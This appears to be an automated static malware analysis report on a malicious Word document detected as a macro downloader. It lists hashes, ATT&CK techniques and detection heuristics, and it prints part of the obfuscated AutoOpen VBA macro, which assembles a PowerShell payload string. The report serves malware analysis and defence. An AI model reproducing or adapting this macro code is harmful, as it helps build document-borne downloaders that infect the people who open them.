Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1e87db3729fb37d1…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 205.5 KB
Created: 2018-09-03 18:27:00
Authoring application: Microsoft Office Word
First seen: 2018-10-07
MD5: 6a1657a19da69e6e9737527c54bf9bb1
SHA-1: 47afe2ceab39d4e1406b21574d4971d9995d3cf4
SHA-256: 1e87db3729fb37d15692a78925b755652263d215db93b0a174e827b71faf0742
Risk score: 250

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes Shell() and CreateObject() calls, indicating an attempt to download and execute a second-stage payload. The ClamAV detection name 'Doc.Downloader.Valyria-6704836-0' further supports its role as a downloader.

Heuristics (8)

  • ClamAV: Doc.Downloader.Valyria-6704836-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6704836-0
  • VBA macros detected [medium] (OLE_VBA_MACROS, 4 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
  • Environ() call (env variable access) [low] (OLE_VBA_ENVIRON)
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 60677 bytes
SHA-256: 434be1ef9d3e9d48483bd84ca3a902b0f12dc1a1ab35e36ccccf793cd746ed6d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"

Sub AutoOpen()
e_kuixtvhu = NaN
If 8629 >= 4178 Then
ieubdbdau = "$poglouhaouyi='a08 + 11';$"
End If
ymksie = NaN
Select Case 62 * 92
Case 5704
ipxiqk = "odyblodpvayioohstaoou='y Byp';"
yead5 = NaN
ieubdbdau = ieubdbdau + ipxiqk
Case ypfmguena76
qsmxwiy = NaN
End Select
ystux = NaN
Select Case "plngvx_gdsy"
Case "plngvx_gdsy"
bmcljhkfu_ybk = "$wiaatvofxaacbo_ea='{ "
keoekcoi = NaN
ieubdbdau = u_mntwhri + ieubdbdau + bmcljhkfu_ybk
End Select
aqaiymsz = NaN
If 66 - 64 = 2 Then
wicfdpu_j7 = "$u_';$m"
ieubdbdau = yloy + ieubdbdau + wicfdpu_j7 + msafzxub
End If
ljihzy = NaN
If 3526 < 1990 Then
Dim ldfiioqe8
ldfiioqe8 = NaN
kjfonwnfqyzf = NaN
ifmhkxqc = NaN
v_appioi = NaN
Else
ofn_ougxa = Environ("SystemRoot")
End If
srmujouxd = NaN
Select Case 72 * 46
Case 3312
uiyiy = ieubdbdau + ejurafkp
Dim irhnxzqhd_otb As String
irhnxzqhd_otb = NaN
eipnu = "rovtemqiebbsr"
kkeibld = NaN
uiyiy = uiyiy + eipnu
Case erudievg_o
iiugdkpd = NaN
End Select
yumy_o_yni = NaN
Select Case "ywzmxuboizq"
Case unhkntzpipo
inmyzrexg = NaN
Case "ywzmxuboizq"
fuayuakgo = qaa_nomyz + uiyiy + uigctkyvz
kkdvii = NaN
fuayuakgo = fuayuakgo + "ommygi_rofj='tion';$"
End Select
iqiec48 = NaN
If 1244 >= 1442 Then
cqtal = NaN
rkmqulm = NaN
ElseIf 3799 > 3177 Then
upvqbeee = "okpmlqslexjoidfhqn_y='$pat';$yhdirprdgnaiomk"
fuayuakgo = fuayuakgo + upvqbeee
Else
iebgr = NaN
Dim urdol As String
urdol = NaN
amjhbtdfydy = NaN
du_ejbwjd = NaN
End If
wsuaji = NaN
Select Case 20 - 96
Case 8777
yyayj = NaN
Case uoeiqeyu
aiuy3 = NaN
Case -76
yoyiiofe = uydnhwejnz + fuayuakgo + gmjvia
uozufftcz = NaN
yoyiiofe = iu_fewi + yoyiiofe + "af"
End Select
lz_afboi_qjy = NaN
If 4360 >= 8316 Then
ElseIf 93 * 91 = 4396 Then
Dim y_zdsuq
y_zdsuq = NaN
eioev = NaN
Else
aogea = e_oedacg_dze1 + yoyiiofe
eoyjnmuu = NaN
aogea = aogea + "nh='x.inf';$u_vdeauykabiyy0"
End If
tpcpaifj = NaN
Select Case 53 + 85
Case 138
o_uev = "7='yunr97"
hzdulbtdewq = NaN
aogea = aogea + o_uev
End Select
tlogwb = NaN
Select Case 70 + 46
Case afii
xhsqpuyajf = NaN
Case 116
iuocaemw = ooerwk + aogea + yifhgmtvq
qpaxas60 = NaN
iuocaemw = iuocaemw + "'')';$sjtmhccih_zo_sveofzomibxhrbeknjei"
End Select
yxtbp = NaN
Select Case "yzfstaytxy7"
Case "yzfstaytxy7"
rljpaeu_i_oa = "vu_oo='i"
meeyaxky = NaN
fjvaifni = NaN
uhqb_t = NaN
iuocaemw = iuocaemw + rljpaeu_i_oa
Case e_oftff_oee6
yczv_qjoye = NaN
Case 19733
yoiur = NaN
End Select
exbvui90 = NaN
Select Case 54 - 51
Case 3
aefpzojo = "le(1)';$oepyvti_gyuxipwoai"
qvou_mbe_n = NaN
iuocaemw = iuocaemw + aefpzojo
End Select
Dim qqofvifqi As String
qqofvifqi = NaN
If 8316 >= 3617 Then
ekwqb = "\syste"
ofn_ougxa = ofn_ougxa + ekwqb
Else
wewgxj = NaN
btttoixqtn = NaN
End If
yahqgd66 = NaN
If 44 + 19 = 25 Then
Dim aoolwiw As String
aoolwiw = NaN
ysdml_i = NaN
ElseIf 2 * 29 = 544 Then
sshoj = NaN
ufbeuq = NaN
Else
yixwl_oi = "='bcli';$qtik"
iuocaemw = iuocaemw + yixwl_oi + pduayjpo
End If
hsybdoi = NaN
Select Case 65 + 51
Case 116
jnsdh_la = iuocaemw
yozydfzo = NaN
jnsdh_la = jnsdh_la + "wja_eioiaer"
Case 24826
uigpwxae35 = NaN
Case 23636
Dim sbao_ey
sbao_ey = NaN
End Select
sczgzy = NaN
Select Case "aobhiht"
Case 18926
vteuicx = NaN
Case "aobhiht"
tlsquzn_wlle = jnsdh_la + oohcdyawta
bbokxaiu_o = NaN
tlsquzn_wlle = tlsquzn_wlle + "davqghiyamgyegnmvdyaut='uble]$"
Case 8928
hga_ebe = NaN
End Select
pvqsabk = NaN
Select Case "ou_yaxau77"
Case iksjrxeofy
dzzpitqh = NaN
Case yjnoeg
hqwae = NaN
Case "ou_yaxau77"
yketpsto = "a';$leiqdaikaupphgaoixrwlt"
ecrfqtqwi = NaN
tlsquzn_wlle = tlsquzn_wlle + yketpsto
End Select
hyey_qpi = NaN
pkeaov = NaN
io_iyu_bti = NaN
Select Case "excwtoq"
Case "e
... (truncated)